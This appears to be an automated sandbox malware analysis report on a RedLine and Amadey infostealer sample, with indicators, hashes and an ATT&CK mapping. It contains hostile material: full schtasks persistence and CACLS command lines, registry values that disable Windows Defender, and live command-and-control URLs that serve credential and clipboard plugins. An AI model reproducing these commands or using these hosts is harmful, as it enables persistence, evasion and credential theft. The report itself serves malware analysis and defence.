                              Source: C:\Windows\SysWOW64\rundll32.exe TID: 3840Thread sleep count: 167 > 30
                              Source: C:\Windows\SysWOW64\rundll32.exe TID: 3840Thread sleep time: -167000s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeLast function: Thread delayed
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeCode function: 2_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,2_2_004019F0
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_2-13902
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeThread delayed: delay time: 180000Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\brJg.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_1-2450
                              Source: C:\Users\user\Desktop\file.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-2451
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeAPI coverage: 6.1 %
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\clip64[1].dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeThread delayed: delay time: 30000Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeThread delayed: delay time: 50000Jump to behavior
                              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user~1\Jump to behavior
                              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user~1\AppData\Local\Temp\Jump to behavior
                              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\Jump to behavior
                              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\xriv.exeJump to behavior
                              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user~1\AppData\Local\Jump to behavior
                              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user~1\AppData\Jump to behavior
                              Source: mnolyk.exe, 0000000F.00000002.775467476.0000000001139000.00000004.00000020.00020000.00000000.sdmp, mnolyk.exe, 0000000F.00000002.775467476.0000000001189000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeProcess information queried: ProcessInformationJump to behavior
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A35467 GetSystemInfo,CreateDirectoryA,RemoveDirectoryA,0_2_00A35467
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A32390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00A32390
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\brJg.exeCode function: 1_2_00F82390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,1_2_00F82390
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 14_2_010BFC58 FindFirstFileExW,14_2_010BFC58
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeCode function: 2_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,2_2_004019F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A3202A memset, memset, RegCreateKeyExA, RegQueryValueExA, RegCloseKey, GetSystemDirectoryA, LoadLibraryA, GetProcAddress, FreeLibrary, GetSystemDirectoryA, GetModuleFileNameA, LocalAlloc, RegCloseKey, RegSetValueExA, RegCloseKey, LocalFree
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe Code function: 14_2_010BA9A1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe Code function: 14_2_010BCFB2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exe Code function: 2_2_0040CE09 IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exe Code function: 2_2_0040ADB0 GetProcessHeap, HeapFree
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exe Memory allocated: page read and write | page guard
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A36F40 SetUnhandledExceptionFilter
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A36CF0 SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\brJg.exe Code function: 1_2_00F86F40 SetUnhandledExceptionFilter
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\brJg.exe Code function: 1_2_00F86CF0 SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exe Code function: 2_2_0040E61C _memset, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exe Code function: 2_2_00416F6A __NMSG_WRITE, _raise, _memset, SetUnhandledExceptionFilter, UnhandledExceptionFilter
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exe Code function: 2_2_004123F1 SetUnhandledExceptionFilter
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe Code function: 14_2_010B790F IsProcessorFeaturePresent, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe Code function: 14_2_010BBB20 IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe Code function: 14_2_010B7208 SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess

                              HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe Code function: 14_2_010A3740 GetModuleFileNameA, CreateProcessA, VirtualAlloc, GetThreadContext, ReadProcessMemory, GetModuleHandleA, GetProcAddress, VirtualAllocEx, WriteProcessMemory, WriteProcessMemory, WriteProcessMemory, SetThreadContext, ResumeThread, VirtualFree, VirtualFree
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe Process created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe "C:\Users\user~1\AppData\Local\Temp\4b9a106e76\mnolyk.exe"
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\user~1\AppData\Local\Temp\4b9a106e76\mnolyk.exe" /F
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "mnolyk.exe" /P "user:N"&&CACLS "mnolyk.exe" /P "user:R" /E&&echo Y|CACLS "..\4b9a106e76" /P "user:N"&&CACLS "..\4b9a106e76" /P "user:R" /E&&Exit
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cacls.exe CACLS "mnolyk.exe" /P "user:N"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cacls.exe CACLS "mnolyk.exe" /P "user:R" /E
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\4b9a106e76" /P "user:N"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\4b9a106e76" /P "user:R" /E
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A318A3 GetCurrentProcess, OpenProcessToken, GetTokenInformation, GetLastError, LocalAlloc, GetTokenInformation, AllocateAndInitializeSid, EqualSid, FreeSid, LocalFree, CloseHandle
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exe Code function: GetLocaleInfoA, 2_2_00417A20
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe Queries volume information: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe Queries volume information: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe Queries volume information: C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe Queries volume information: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe Code function: 14_2_010B7AFC cpuid
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A37155 GetSystemTimeAsFileTime, GetCurrentProcessId, GetCurrentThreadId, GetTickCount, QueryPerformanceCounter
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe Code function: 14_2_010C3C76 _free, _free, _free, GetTimeZoneInformation, _free
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exe Code function: 2_2_020296A8 GetUserNameA
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A32BFB GetVersion, GetModuleHandleW, GetProcAddress, CloseHandle

                              Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exe Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection DisableIOAVProtection 1
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exe Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1

                              Stealing of Sensitive Information

Source: Yara match, File source: 2.2.arJf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 2.2.arJf.exe.580e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 2.3.arJf.exe.5b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 2.2.arJf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000002.00000002.360346336.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match, File source: 00000002.00000002.362707528.0000000000580000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000002.00000003.336400821.00000000005B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 28.2.mnolyk.exe.70000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 26.2.mnolyk.exe.70000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 31.0.mnolyk.exe.70000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 28.0.mnolyk.exe.70000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.3.file.exe.4a09a20.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 15.2.mnolyk.exe.70000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 33.0.mnolyk.exe.70000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 33.2.mnolyk.exe.70000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 14.2.xriv.exe.10a0000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.3.file.exe.4a09a20.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 15.0.mnolyk.exe.70000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 14.0.xriv.exe.10a0000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 26.0.mnolyk.exe.70000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 31.2.mnolyk.exe.70000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe, type: DROPPED
Source: Yara match, File source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe, type: DROPPED
Source: Yara match, File source: dump.pcap, type: PCAP
Source: Yara match, File source: 0000000F.00000002.775467476.0000000001139000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 0000000F.00000002.775467476.0000000001189000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: mnolyk.exe PID: 2728, type: MEMORYSTR
Source: Yara match, File source: 27.2.rundll32.exe.6fb90000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\clip64[1].dll, type: DROPPED
Source: Yara match, File source: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, type: DROPPED

                              Remote Access Functionality

Source: Yara match, File source: 2.2.arJf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 2.2.arJf.exe.580e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 2.3.arJf.exe.5b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 2.2.arJf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000002.00000002.360346336.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match, File source: 00000002.00000002.362707528.0000000000580000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000002.00000003.336400821.00000000005B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise; Compromise Software Dependencies and Development Tools; Compromise Software Supply Chain
Execution: 3 Native API; 2 Command and Scripting Interpreter; 1 Scheduled Task/Job; 1 Service Execution; Cron; Launchd; Scheduled Task; Command and Scripting Interpreter; PowerShell; AppleScript; Windows Command Shell; Unix Shell
Persistence: 1 Windows Service; 1 Scheduled Task/Job; 1 Registry Run Keys / Startup Folder; 1 Services File Permissions Weakness; Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux); At (Windows); Cron; Launchd
Privilege Escalation: 2 Bypass User Access Control; 1 Access Token Manipulation; 1 Windows Service; 111 Process Injection; 1 Scheduled Task/Job; 1 Registry Run Keys / Startup Folder; 1 Services File Permissions Weakness; Scheduled Task/Job; At (Linux); At (Windows); Cron; Launchd
Defense Evasion: 21 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 2 Obfuscated Files or Information; 2 Software Packing; 1 Timestomp; 2 Bypass User Access Control; 1 Masquerading; 21 Virtualization/Sandbox Evasion; 1 Access Token Manipulation; 111 Process Injection; 1 Services File Permissions Weakness; 1 Rundll32
Credential Access: 1 Input Capture; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing; Input Capture; Keylogging
Discovery: 2 System Time Discovery; 1 Account Discovery; 3 File and Directory Discovery; 36 System Information Discovery; 131 Security Software Discovery; 21 Virtualization/Sandbox Evasion; 2 Process Discovery; 1 System Owner/User Discovery; System Network Connections Discovery; Process Discovery; Permission Groups Discovery; Local Groups
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot; Software Deployment Tools; Taint Shared Content; Replication Through Removable Media; Component Object Model and Distributed COM
Collection: 1 Archive Collected Data; 1 Input Capture; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging; Remote Data Staging; Screen Capture
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol; Exfiltration Over Physical Medium; Exfiltration over USB
Command and Control: 14 Ingress Tool Transfer; 2 Encrypted Channel; 3 Non-Application Layer Protocol; 113 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols; Mail Protocols; DNS
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols; Rogue Cellular Base Station
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: 1 System Shutdown/Reboot; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery
[Behavior graph: ID 799672, Sample: file.exe, Start date: 06/02/2023, Architecture: WINDOWS, Score: 100]

Source | Detection | Scanner | Label | Link
file.exe | 69% | ReversingLabs | Win32.Spyware.RedLine |
file.exe | 51% | Virustotal | | Browse
file.exe | 100% | Joe Sandbox ML | |

Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Temp\IXP000.TMP\brJg.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\clip64[1].dll | 81% | ReversingLabs | Win32.Trojan.Amadey |
C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe | 81% | ReversingLabs | Win32.Spyware.RedLine |
C:\Users\user\AppData\Local\Temp\IXP000.TMP\brJg.exe | 49% | ReversingLabs | Win32.Trojan.Tedy |
C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe | 81% | ReversingLabs | Win32.Spyware.RedLine |
C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exe | 28% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe | 82% | ReversingLabs | ByteCode-MSIL.Trojan.Disabler |
C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll | 81% | ReversingLabs | Win32.Trojan.Amadey |
                              No Antivirus matches
                              No Antivirus matches
                              No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://62.204.41.4/Gol478Ns/Plugins/cred64.dll | true | 2%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://62.204.41.4/Gol478Ns/Plugins/clip64.dll | true | Avira URL Cloud: malware | unknown
62.204.41.4/Gol478Ns/index.php | true | Avira URL Cloud: safe | low
http://62.204.41.4/Gol478Ns/index.php | true | Avira URL Cloud: safe | unknown
                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs
                              IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                              62.204.41.4 | unknown | United Kingdom | | 30798 | TNNET-ASTNNetOyMainnetworkFI | true
                              Joe Sandbox Version:36.0.0 Rainbow Opal
                              Analysis ID:799672
                              Start date and time:2023-02-06 18:33:46 +01:00
                              Joe Sandbox Product:CloudBasic
                              Overall analysis duration:0h 12m 30s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                              Number of analysed new started processes analysed:34
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • HDC enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample file name:file.exe
                              Detection:MAL
                              Classification:mal100.troj.spyw.evad.winEXE@37/14@0/1
                              EGA Information:
                              • Successful, ratio: 100%
                              HDC Information:
                              • Successful, ratio: 63.2% (good quality ratio 60.5%)
                              • Quality average: 85%
                              • Quality standard deviation: 24.3%
                              HCA Information:
                              • Successful, ratio: 90%
                              • Number of executed functions: 100
                              • Number of non-executed functions: 116
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Override analysis time to 240s for rundll32
                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
                              • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, login.live.com, ctldl.windowsupdate.com
                              • Not all processes where analyzed, report is missing behavior information
                              • Report creation exceeded maximum time and may have missing disassembly code information.
                              • Report size exceeded maximum capacity and may have missing behavior information.
                              • Report size getting too big, too many NtDeviceIoControlFile calls found.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              Time | Type | Description
                              18:35:55 | API Interceptor | 2091x Sleep call for process: mnolyk.exe modified
                              18:35:56 | Task Scheduler | Run new task: mnolyk.exe path: C:\Users\user~1\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                              Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
                              62.204.41.4 | file.exe | | malicious | | 62.204.41.4/Gol478Ns/index.php
                              62.204.41.4 | QEb6ybdVBd.exe | | malicious | | 62.204.41.4/Gol478Ns/index.php
                              62.204.41.4 | 9U2j7fIA6J.exe | | malicious | | 62.204.41.4/Gol478Ns/index.php
                              No context
                              Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
                              TNNET-ASTNNetOyMainnetworkFI | file.exe | | malicious | | 62.204.41.4
                              TNNET-ASTNNetOyMainnetworkFI | d5Mz8LcQ40.exe | | malicious | | 62.204.41.5
                              TNNET-ASTNNetOyMainnetworkFI | 4tZ5R2O8ru.exe | | malicious | | 62.204.41.5
                              TNNET-ASTNNetOyMainnetworkFI | Z7MMw0PTfb.exe | | malicious | | 62.204.41.5
                              TNNET-ASTNNetOyMainnetworkFI | cGvwe523RO.exe | | malicious | | 62.204.41.170
                              TNNET-ASTNNetOyMainnetworkFI | 9Nn6GvGMz1.exe | | malicious | | 62.204.41.170
                              TNNET-ASTNNetOyMainnetworkFI | 07wuYH0G0l.exe | | malicious | | 62.204.41.170
                              No context
                              Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\clip64[1].dll | file.exe | | malicious | |
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\clip64[1].dll | QEb6ybdVBd.exe | | malicious | |
                                                                      Process:C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe
                                                                      File Type:CSV text
                                                                      Category:dropped
                                                                      Size (bytes):226
                                                                      Entropy (8bit):5.354940450065058
                                                                      Encrypted:false
                                                                      SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2wlAsDZiIv:Q3La/KDLI4MWuPTxAIv
                                                                      MD5:B10E37251C5B495643F331DB2EEC3394
                                                                      SHA1:25A5FFE4C2554C2B9A7C2794C9FE215998871193
                                                                      SHA-256:8A6B926C70F8DCFD915D68F167A1243B9DF7B9F642304F570CE584832D12102D
                                                                      SHA-512:296BC182515900934AA96E996FC48B565B7857801A07FEFA0D3D1E0C165981B266B084E344DB5B53041D1171F9C6708B4EE0D444906391C4FC073BCC23B92C37
                                                                      Malicious:false
                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..
                                                                      Process:C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exe
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):321
                                                                      Entropy (8bit):5.355221377978991
                                                                      Encrypted:false
                                                                      SSDEEP:6:Q3La/xwchM3RJoDLIP12MUAvvR+uCqDLIP12MUAvvR+uTL2LDY3U21v:Q3La/hhkvoDLI4MWuCqDLI4MWuPk21v
                                                                      MD5:03C5BA5FCE7124B503EA65EF522177C3
                                                                      SHA1:F76B1F538D5EA66664355901E927B2F870ACCDD8
                                                                      SHA-256:8128CE419BBE0419F1A0BDE97C3A14E3377C0184DC1D7AF61AA01AAB756B625B
                                                                      SHA-512:151A974DDABA852144EC4BC18C548227A32E5261736F186A3920F2497434AEE9DBB0E0AB77E0E52A84A9FBC4529A158882B7549763400DDC2082D384B1135141
                                                                      Malicious:false
                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..
                                                                      Process:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):91136
                                                                      Entropy (8bit):6.3469756750979025
                                                                      Encrypted:false
                                                                      SSDEEP:1536:Fto4NPCKLbqoYkbpplW9YoUsxXzbcouNhj2ZszsWuKcdJU7dz5QIaB89p:roUCWbBNpplToUs1uNhj25LJUDaB89p
                                                                      MD5:C79B74D8FEC5E7E2BA2F1789FD582A15
                                                                      SHA1:78A1E5D99DBACCC5E07B125E1DFB280112CB3128
                                                                      SHA-256:B5BD049D32F0FAEEA6CE65A0F0D326DE5BC4427A7C1AD24BFB0EA050C1DEC7D3
                                                                      SHA-512:0DEBFC54904FD538CFB1FC648D18F90A991337200B3DECF74B28AC2F341843FB3BAB4F45BC92CFEC333B18DFFF9CC136854462E79054A39926A7BD8EE2E057BA
